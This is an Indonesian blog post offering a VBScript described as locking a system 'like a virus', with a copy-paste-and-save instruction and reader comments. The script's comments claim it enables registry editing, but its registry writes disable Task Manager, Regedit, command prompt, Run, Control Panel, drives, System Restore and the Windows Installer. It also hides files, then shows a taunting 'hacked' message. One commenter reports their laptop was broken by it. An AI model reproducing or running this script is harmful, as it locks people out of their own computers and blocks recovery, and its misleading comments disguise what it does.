'PROGRAM SEDERHANA MEMBUAT SYSTEM TERKUNCI SEPERTI HAL NYA VIRUS
'Enable Registry Editing'
'A? Veegertx - 4/7/2004
'This code may be freely distributed/modified
On Error Resume Next
'Prevents errors from values that don't exist
Set WshShell = WScript.CreateObject("WScript.Shell")
'Delete DisableCMD registry values
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoSecCPL",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\LockTaskbar",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableChangePassword",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetworkConnections",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckPointing",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Policies\MIcrosoft\Windows\Installer\DisableMSI",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\FullPathAddress",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
WshShell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption",Warning,"REG_SZ"
WshShell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText",Silahkan_Cek_Komputer,"REG_SZ"
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\\System\\DisableStatusMessages",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\\System\\DisableStatusMessages",1,"REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableRegistryTools",1,"REG_DWORD"
'display message
Message = "Patch CMD and Regedit succesfull, hacked vbs from natan !!!"
X = MsgBox(Message, vbOKOnly, "he..he..he..",vbInformation)
Set WshShell = Nothing
Set fso = Nothing
[/code]
'==========================================
Kopi paste script diatas ke notepad save dengan extension .vbs
Langganan:
Posting Komentar (Atom)
mas..........ku tadi malam mencoba script yang berextention vbs ini di laptopku.........tapi yangterjadi malah super error.......gmna nich pengen ngembalikan seperti semula.
BalasHapusharap di reply cz ku g' mau nginstall ulang lagi.
C
gan. mantep pokonya deh....!!!
BalasHapuspas selesai saya rename kasperkey langsung teriak, smadav juga langsung mendetect script
gan.. mao nyana nih...?
program brutus masih ada yang bisa di pake ga?
mohon replay secepetnya..
thx n maju terus.....!!!!!!!!!!!